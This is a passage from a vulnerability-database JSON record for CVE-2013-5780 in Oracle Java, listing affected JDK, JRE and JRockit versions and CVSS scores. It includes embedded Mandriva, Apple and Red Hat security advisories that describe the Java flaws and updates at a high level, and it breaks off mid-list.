"cpe:2.3:a:oracle:jdk:1.7.0:update5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update25:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update21:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:*:update40:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.7.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r27.7.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r27.7.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r27.7.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "r27.7.6", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r27.7.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r27.7.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update25:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update21:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:*:update40:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.7.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_19:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_14:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update33:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update24:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update23:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_16:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update25:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_18:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update32:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update31:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update22:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_21:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update29:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update27:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_20:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_12:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update1_b06:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update37:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update35:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update34:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update41:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update43:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update26:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update39:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:*:update60:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.6.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update45:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update30:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update51:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update38:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "r28.2.8", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r28.2.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r28.1.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r28.1.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r28.1.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r28.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r28.1.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r28.2.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r28.2.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r28.0.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r28.2.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r28.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r28.1.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r28.2.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2013-5780" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Red Hat", "sources": [ { "db": "PACKETSTORM", "id": "124303" }, { "db": "PACKETSTORM", "id": "123941" }, { "db": "PACKETSTORM", "id": "123921" }, { "db": "PACKETSTORM", "id": "123689" }, { "db": "PACKETSTORM", "id": "123722" } ], "trust": 0.5 }, "cve": "CVE-2013-5780", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULMON", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "CVE-2013-5780", "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "MEDIUM", "trust": 0.1, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2013-5780", "trust": 1.0, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201310-360", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2013-5780", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2013-5780" }, { "db": "CNNVD", "id": "CNNVD-201310-360" }, { "db": "NVD", "id": "CVE-2013-5780" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, Java SE 5.0u51 and earlier, JRockit R28.2.8 and earlier, JRockit R27.7.6 and earlier, and Java SE Embedded 7u40 and earlier allows remote attackers to affect confidentiality via unknown vectors related to Libraries. \nThe vulnerability can be exploited over multiple protocols. This issue affects the \u0027Libraries\u0027 sub-component. In a typical operating environment, these are of low\nsecurity risk as the runtime is not used on untrusted applets. \n \n This updates IcedTea6 to version 1.11.14, which fixes these issues,\n as well as several others. The verification\n of md5 checksums and GPG signatures is performed automatically for you. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/en/support/security/advisories/\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.12 (GNU/Linux)\n\niD8DBQFSiycxmqjQ0CJFipgRAgEDAKDflCdAJCTeaiQlfwCT2ypkKWxMAQCguZqZ\nJVNYykKzXuNiMTc7JATPYjA=\n=20DS\n-----END PGP SIGNATURE-----\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nAPPLE-SA-2013-10-15-1 Java for OS X 2013-005 and\nMac OS X v10.6 Update 17\n\nJava for OS X 2013-005 and Mac OS X v10.6 Update 17 is now available\nand addresses the following:\n\nJava\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,\nOS X Lion v10.7 or later, OS X Lion Server v10.7 or later,\nOS X Mountain Lion 10.8 or later\nImpact: Multiple vulnerabilities in Java 1.6.0_51\nDescription: 8011782 Multiple vulnerabilities existed in Java\n1.6.0_51, the most serious of which may allow an untrusted Java\napplet to execute arbitrary code outside the Java sandbox. Further information is available via the Java website at ht\ntp://www.oracle.com/technetwork/java/javase/releasenotes-136954.html\nCVE-ID\nCVE-2013-3829\nCVE-2013-4002\nCVE-2013-5772\nCVE-2013-5774\nCVE-2013-5776\nCVE-2013-5778\nCVE-2013-5780\nCVE-2013-5782\nCVE-2013-5783\nCVE-2013-5784\nCVE-2013-5787\nCVE-2013-5789\nCVE-2013-5790\nCVE-2013-5797\nCVE-2013-5801\nCVE-2013-5802\nCVE-2013-5803\nCVE-2013-5804\nCVE-2013-5809\nCVE-2013-5812\nCVE-2013-5814\nCVE-2013-5817\nCVE-2013-5818\nCVE-2013-5819\nCVE-2013-5820\nCVE-2013-5823\nCVE-2013-5824\nCVE-2013-5825\nCVE-2013-5829\nCVE-2013-5830\nCVE-2013-5831\nCVE-2013-5832\nCVE-2013-5840\nCVE-2013-5842\nCVE-2013-5843\nCVE-2013-5848\nCVE-2013-5849\nCVE-2013-5850\n\n\nJava for OS X 2013-005 and Mac OS X v10.6 Update 17\nmay be obtained from the Software Update pane in System Preferences,\nMac App Store, or Apple\u0027s Software Downloads web site:\nhttp://www.apple.com/support/downloads/\n\nFor Mac OS X v10.6 systems\nThe download file is named: JavaForMacOSX10.6update17.dmg\nIts SHA-1 digest is: 5dfe7eaebf9726352c97964da61d57fa28246c08\n\nFor OS X Lion and Mountain Lion systems\nThe download file is named: JavaForOSX2013-005.dmg\nIts SHA-1 digest is: ce78f9a916b91ec408c933bd0bde5973ca8a2dc4\n\n\nInformation will also be posted to the Apple Security Updates\nweb site: http://support.apple.com/kb/HT1222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG/MacGPG2 v2.0.17 (Darwin)\nComment: GPGTools - http://gpgtools.org\n\niQIcBAEBAgAGBQJSXYc6AAoJEPefwLHPlZEwD8EP/3aN1h4wIM/BjidF3ZY+PXf3\nLzgtb8yAxh03A+J3NJCd3BKmjINXIo9Wwt9aUTktEz4UefvpF+rIsgKSinotvQt0\nTmtsYPItFgs83Lj2IFBpCLurM+O0fUhje+mvVzR/KA7kHvrtXYRC5w2plWh32Smm\nD4Ejh8odeR0IU3OdWV5MJpcRoRpRySX16JOEJc76SIE0+sbOLHZ90rmzyPMB0S2u\njZRq8qY3DJS9C5De97gh8F/V76fV8Aiq6RwGPs9m+tJUCJe6XLEy8Wq/G3jlKXyr\n+KrradRl9Bz5oTUnVDlN9odoOGZ/J4nq4xs0RyN08uETKcw6315+7UTP3B+hD8IM\n1YyWeceCd8oHtWlR/02spwaku5ctxiUZpqXQ8DxDH3e8dONBfndfmKGUnywQSFd8\nvCgZR0SQgSbhtD/UnNGW9VgJsxKgO4gi17aVD/B9LYmMztsSB+wPkg96uTR6J7yh\n+ogJqYeOGsMvvQd8XY++ig1bhEsfzzauEWnq3G4WG8E+Fep+5RHZewxnhzakapqW\n2z7byXHNXtIP2cxL//DG/x4ed+gAWzKxZyPDPSrltw162mkJk/6mTedtpead4LH8\nOoi4Cf1HMbC9gdRBdtGNWo7EN9kr9rpajuRWjqxT5uTLAgJusKk5UnSO2KJtromy\nLos4PbyC//yRidZKynqx\n=I3n5\n-----END PGP SIGNATURE-----\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: java-1.6.0-openjdk security update\nAdvisory ID: RHSA-2013:1505-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2013-1505.html\nIssue date: 2013-11-05\nCVE Names: CVE-2013-3829 CVE-2013-4002 CVE-2013-5772 \n CVE-2013-5774 CVE-2013-5778 CVE-2013-5780 \n CVE-2013-5782 CVE-2013-5783 CVE-2013-5784 \n CVE-2013-5790 CVE-2013-5797 CVE-2013-5802 \n CVE-2013-5803 CVE-2013-5804 CVE-2013-5809 \n CVE-2013-5814 CVE-2013-5817 CVE-2013-5820 \n CVE-2013-5823 CVE-2013-5825 CVE-2013-5829 \n CVE-2013-5830 CVE-2013-5840 CVE-2013-5842 \n CVE-2013-5849 CVE-2013-5850 \n=====================================================================\n\n1. Summary:\n\nUpdated java-1.6.0-openjdk packages that fix various security issues are\nnow available for Red Hat Enterprise Linux 5 and 6. \n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux (v. 5 server) - i386, x86_64\nRed Hat Enterprise Linux Desktop (v. 5 client) - i386, x86_64\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\n\n3. Description:\n\nThe java-1.6.0-openjdk packages provide the OpenJDK 6 Java Runtime\nEnvironment and the OpenJDK 6 Java Software Development Kit. \n\nMultiple input checking flaws were found in the 2D component native image\nparsing code. A specially crafted image file could trigger a Java Virtual\nMachine memory corruption and, possibly, lead to arbitrary code execution\nwith the privileges of the user running the Java Virtual Machine. \n(CVE-2013-5782)\n\nThe class loader did not properly check the package access for non-public\nproxy classes. A remote attacker could possibly use this flaw to execute\narbitrary code with the privileges of the user running the Java Virtual\nMachine. (CVE-2013-5830)\n\nMultiple improper permission check issues were discovered in the 2D, CORBA,\nJNDI, and Libraries components in OpenJDK. An untrusted Java application or\napplet could use these flaws to bypass Java sandbox restrictions. \n(CVE-2013-5829, CVE-2013-5814, CVE-2013-5817, CVE-2013-5842, CVE-2013-5850)\n\nMultiple input checking flaws were discovered in the JPEG image reading and\nwriting code in the 2D component. An untrusted Java application or applet\ncould use these flaws to corrupt the Java Virtual Machine memory and bypass\nJava sandbox restrictions. (CVE-2013-5809)\n\nThe FEATURE_SECURE_PROCESSING setting was not properly honored by the\njavax.xml.transform package transformers. A remote attacker could use this\nflaw to supply a crafted XML that would be processed without the intended\nsecurity restrictions. (CVE-2013-5802)\n\nMultiple errors were discovered in the way the JAXP and Security components\nprocesses XML inputs. A remote attacker could create a crafted XML that\nwould cause a Java application to use an excessive amount of CPU and memory\nwhen processed. (CVE-2013-5825, CVE-2013-4002, CVE-2013-5823)\n\nMultiple improper permission check issues were discovered in the Libraries,\nSwing, JAX-WS, JGSS, AWT, Beans, and Scripting components in OpenJDK. An\nuntrusted Java application or applet could use these flaws to bypass\ncertain Java sandbox restrictions. (CVE-2013-3829, CVE-2013-5840,\nCVE-2013-5774, CVE-2013-5783, CVE-2013-5820, CVE-2013-5849, CVE-2013-5790,\nCVE-2013-5784)\n\nIt was discovered that the 2D component image library did not properly\ncheck bounds when performing image conversions. An untrusted Java\napplication or applet could use this flaw to disclose portions of the Java\nVirtual Machine memory. (CVE-2013-5778)\n\nMultiple input sanitization flaws were discovered in javadoc. When javadoc\ndocumentation was generated from an untrusted Java source code and hosted\non a domain not controlled by the code author, these issues could make it\neasier to perform cross-site scripting attacks. (CVE-2013-5804,\nCVE-2013-5797)\n\nVarious OpenJDK classes that represent cryptographic keys could leak\nprivate key information by including sensitive data in strings returned by\ntoString() methods. These flaws could possibly lead to an unexpected\nexposure of sensitive key data. (CVE-2013-5780)\n\nThe Java Heap Analysis Tool (jhat) failed to properly escape all data added\ninto the HTML pages it generated. Crafted content in the memory of a Java\nprogram analyzed using jhat could possibly be used to conduct cross-site\nscripting attacks. (CVE-2013-5772)\n\nThe Kerberos implementation in OpenJDK did not properly parse KDC\nresponses. A malformed packet could cause a Java application using JGSS to\nexit. (CVE-2013-5803)\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to use the\nRed Hat Network to apply this update are available at\nhttps://access.redhat.com/site/articles/11258\n\n5. Bugs fixed (http://bugzilla.redhat.com/):\n\n1018713 - CVE-2013-5803 OpenJDK: insufficient checks of KDC replies (JGSS, 8014341)\n1018717 - CVE-2013-5772 OpenJDK: insufficient html escaping in jhat (jhat, 8011081)\n1018720 - CVE-2013-5797 OpenJDK: insufficient escaping of window title string (Javadoc, 8016675)\n1018727 - CVE-2013-5784 OpenJDK: insufficient InterfaceImplementor security checks (Scripting, 8017299)\n1018736 - CVE-2013-5790 OpenJDK: insufficient security checks (Beans, 8012071)\n1018750 - CVE-2013-5849 OpenJDK: insufficient DataFlavor security checks (AWT, 8012277)\n1018785 - CVE-2013-5780 OpenJDK: key data leak via toString() methods (Libraries, 8011071)\n1018831 - CVE-2013-5840 OpenJDK: getDeclaringClass() information leak (Libraries, 8014349)\n1018972 - CVE-2013-5820 OpenJDK: insufficient security checks (JAXWS, 8017505)\n1018984 - CVE-2013-5778 OpenJDK: image conversion out of bounds read (2D, 8014102)\n1019108 - CVE-2013-5782 OpenJDK: Incorrect awt_getPixelByte/awt_getPixelShort/awt_setPixelByte/awt_setPixelShort image raster checks (2D, 8014093)\n1019110 - CVE-2013-5830 OpenJDK: checkPackageAccess missing security check (Libraries, 8017291)\n1019113 - CVE-2013-5809 OpenJDK: JPEGImageReader and JPEGImageWriter missing band size checks (2D, 8013510)\n1019115 - CVE-2013-5829 OpenJDK: Java2d Disposer security bypass (2D, 8017287)\n1019117 - CVE-2013-5814 OpenJDK: RMIConnection stub missing permission check (CORBA, 8011157)\n1019118 - CVE-2013-5817 OpenJDK: VersionHelper12 does not honor modifyThreadGroup restriction (JNDI, 8013739)\n1019123 - CVE-2013-5842 OpenJDK: ObjectInputStream/ObjectOutputStream missing checks (Libraries, 8014987)\n1019127 - CVE-2013-5850 OpenJDK: Missing CORBA security checks (Libraries, 8017196)\n1019130 - CVE-2013-5802 OpenJDK: javax.xml.transform.TransformerFactory does not properly honor XMLConstants.FEATURE_SECURE_PROCESSING (JAXP, 8012425)\n1019131 - CVE-2013-5804 OpenJDK: javac does not ignore certain ignorable characters (Javadoc, 8016653)\n1019133 - CVE-2013-3829 OpenJDK: java.util.TimeZone does not restrict setting of default time zone (Libraries, 8001029)\n1019137 - CVE-2013-5783 OpenJDK: JTable not properly performing certain access checks (Swing, 8013744)\n1019139 - CVE-2013-5825 OpenJDK: XML parsing Denial of Service (JAXP, 8014530)\n1019145 - CVE-2013-5823 OpenJDK: com.sun.org.apache.xml.internal.security.utils.UnsyncByteArrayOutputStream Denial of Service (Security, 8021290)\n1019147 - CVE-2013-5774 OpenJDK: Inet6Address class IPv6 address processing errors (Libraries, 8015743)\n1019176 - CVE-2013-4002 OpenJDK: XML parsing Denial of Service (JAXP, 8017298)\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 5 